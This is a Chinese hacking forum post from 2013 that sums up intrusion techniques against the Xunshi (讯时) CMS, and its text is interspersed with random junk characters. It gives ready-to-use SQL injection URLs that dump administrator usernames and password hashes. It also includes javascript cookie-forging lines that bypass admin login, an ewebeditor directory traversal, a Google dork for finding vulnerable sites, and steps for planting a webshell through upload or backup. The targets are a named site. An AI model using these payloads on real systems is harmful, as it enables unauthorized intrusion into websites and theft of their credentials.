找回密码
 立即注册
查看: 3322|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
by:血封忆尘
$ }+ T' g( R/ t+ {. s: [( w9 {. w1 I+ v
- d' T1 b' @% d( I( U在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)- m( e% @+ h3 i: ^2 Z9 p

1 b( p" e' f( [5 S0 A以下本文总结来自黑防去年第9期杂志上的内容...
/ P. n; \( I; B' z. c+ \5 w) M: p6 R0 |7 T9 s& }" g
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%, h: h6 f2 x. z& ~0 c
  }5 r- F/ @9 S0 _( @& n# b
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2 ~5 i- B  n, V; d. x" o
, E. C2 Y& E8 G  `# I, {; {记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
% J4 }$ l: ]4 J6 ?  x这里一个注入
  ?% _' p0 X8 E4 w$ I
1 t$ h4 G; r& ]效果如图:; d& T0 F' \( [2 z) H

7 t9 a& M. T  T; l2 \( m 5 a- T7 h; X) y- [

2 c7 [2 N  T; e这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.1 [" g/ I$ M; x! e2 u

' ?! [% u" C: ~' _) e密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
% k5 ^$ X3 C9 d4 [
6 w+ Q! ^( u5 D; G7 R' Wjavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));9 k# I5 U+ E# X

# ~* r4 p0 N3 b' [+ Y) h那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
. `* m+ y  `. k, Q+ b' X, k2 c+ m& I# c" \
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
- c0 T9 I- `2 c# v8 H1 l% H! ]
/ N% Y) a) W4 F6 h$ \: q5 X它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以8 d* p/ x. }' n% W

% X5 L& j( J  B0 V2 |访问这页面来列目录..步骤如下:4 Z* U, s8 i& C5 x5 T

2 Q  H! D* h6 y5 Hjavascript:alert(document.cookie="admindj=1") ( b" n0 z% Q* N& o, M

2 t2 w2 \! C4 T/ u$ r! r$ b1 E$ Hhttp://www.political-security.co ... asp?id=46&dir=../..
* Z9 i0 c1 I* O% H5 ?; R2 _- _8 U! C5 S' u# d+ S
效果如图:
( s$ _( |' p, {; n) h! K2 \" C: C' _! C- F1 `2 H8 D4 P0 I

- o' w3 |+ a+ N# r* I' K
" ^8 n# O1 R. O* H3 q这样全站目录都能瞧了..找到后台目录..进去..
4 {, v9 _, l0 V$ A( l) R" _& F  d) ~) p5 v( _
那么进了后台怎么拿shell??上传--备份就ok了..
: w6 g2 Z& D# O) w1 f% K3 }& q  [8 N; }0 R- X/ o1 R9 F
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..4 `* L* `' G) e: D6 L% Q7 \3 R

, t+ ]; ^$ K3 n2 J5 w6 H这个我也碰到过一次..你都可以通过列目录来实现../ j/ y. n: ], \8 P8 \! E$ l

8 g2 H7 \& k+ Zjavascript:alert(document.cookie="admindj=1") 8 A: K1 G8 W; e$ ^- ~6 t

3 C( q' B# }3 b6 u2 z9 Ihttp://www.political-security.co ... p?action=BackupData 2 D: |8 Y, `+ Y* n" B* [

7 K" n" P. c8 S" i# T' }( R备份ok..
8 n/ z# V$ ^3 R: [' N- o9 B( s8 x4 ^6 ?- g
那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
# u' L* T( l1 t5 d. o/ q5 p% J
8 I4 ?7 C. _- \# k* K- H) W在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下& U, _* `6 c  k* J9 o7 @

% d" U' X# q. P# u0 d7 A然后访问此页面进行注入..步骤如下:- x7 [4 [& o6 V2 G( l

, y- I2 c4 r& y/ gjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")( ?1 G" S8 @" p0 W, S8 q% b
+ V8 T# y9 D5 j" f; r# t2 L
然后请求admin/admin_chk.asp页面; B, _; x8 F) P

& l5 X) U3 E% D* ^2 k! V  k. A输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
. e1 B1 X4 x/ D* g3 D9 J; n5 E! _7 }
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
, f3 [! u9 w" y6 k# d3 G& r" ~% a
效果如图所示:2 S; D$ E" n( b9 C0 c1 X

( ]/ u0 D& ?. I# _$ F " C2 G! T8 u# e; o) z5 B
5 |! K* @- S  _$ W
讯时漏洞2
! G' Z4 c) J" N' }9 Lgoogle关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)
% d6 B# m5 r2 d! F * |8 S1 F! b4 n  |6 ?" `! p5 Z
1、/admin/admin_news_pl_view.asp?id=1
$ m) [4 e' ]8 e+ B3 u- X: f//id任意 填入以下语句0 G3 L  }, J; D' `& w/ k7 A+ B/ ]

1 o3 p7 _. a: Y; w2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!9 n7 w; b  x' u  Z6 E9 m

  \; g6 j6 j& L. b; b  x6 Q4 U+ ]4 k2 K0 R, L, D5 h2 u
3 h7 |+ n, _7 \) w- x" @! S: W/ q7 N
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
+ p, h$ z: ^+ i9 x0 X8 ~8 _+ n " P4 l! r$ Q) V3 e$ z# t5 U* b# ]

3 r7 f/ M( F; i/ L6 a8 X: }/ V$ @+ _
爆出管理员帐号和密码了# s8 ~% ~: a; {3 q6 l# c

+ j) G  U8 ?6 \) ^
4 N9 P3 K$ @$ f0 p) o) h9 S' M4 Y6 M1 H8 t; U4 g- H- t$ @
4、cookies进后台
8 l( \2 l# A2 n1 Q7 v" w+ f 4 e: a; _0 n& h
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
% Y- X+ J) |& i
. N1 i7 L: L- n# P
7 F; D& B" {1 E& W$ d) _6 ~( y. B$ ?: I+ b1 C
5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
2 i3 O* }& Z& D( _- z) \7 p " E% E2 @" Y5 F6 j" P
/ U& j6 H1 z3 S0 s( i
% H/ S# z9 I6 D
6、后台有上传和备份取SHELL不难。
+ ~, a" p/ ^, ^* C* w 5 `2 D: c5 B2 V5 V" z: U! g( }
7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
! W, a0 I5 h, `  b( ~& @5 R * V: T! g3 e: f# L
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
0 R  J8 n; |5 m1 S# G2 Z+ a7 u: o4 @* K
1 J# j: L3 v0 N
- a+ t% Y. q1 |( f$ I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表